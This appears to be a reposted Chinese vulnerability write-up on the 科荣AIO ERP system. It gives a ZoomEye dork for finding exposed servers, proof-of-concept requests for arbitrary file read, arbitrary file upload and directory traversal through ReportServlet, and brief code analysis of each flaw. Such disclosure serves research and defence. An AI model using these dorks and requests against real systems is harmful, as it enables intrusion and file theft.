免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责。
|
前言
科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP(进销存财务)、OAOA(办公⾃动化)、CRMCRM(客⼾关系管理)、UDPUDP(⾃定义平台),集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。
搜索引擎
ZoomEye: "changeAccount('8000')"
漏洞复现
新版本
任意文件读取
http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
代码分析
当operation
的值为getPicFile
,将传入的fileName
参数值进行判断是否以"/DISK"
开头并且不为空,如果不为空并以"/DISK"
开头进行截取如:/DISKC/Windows/Win.ini ==>DISKC/Windows/Win.ini
,接着判断是否"DISK"
开头,如果不为空并以"DISK"
开头又进行截取然后拼接:
如DISKC/Windows/Win.ini
==>C:/Windows/Win.ini
最后进行文件读取下载。
老版本
任意文件上传
POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
Host: xxxxxx
Connection: lose
Content-Type: application/x-www-form-urlencoded
Content-Length: 2
demo
代码分析
代码很直接获取POST输入流将内容写到指定fileName
中,由于fileName
未进行过滤导致可以进行越级上传。
目录遍历
http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
代码分析
直接将path
带入进行拼接然后遍历输出。
★
原文始发于微信公众号(渗透安全团队):科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论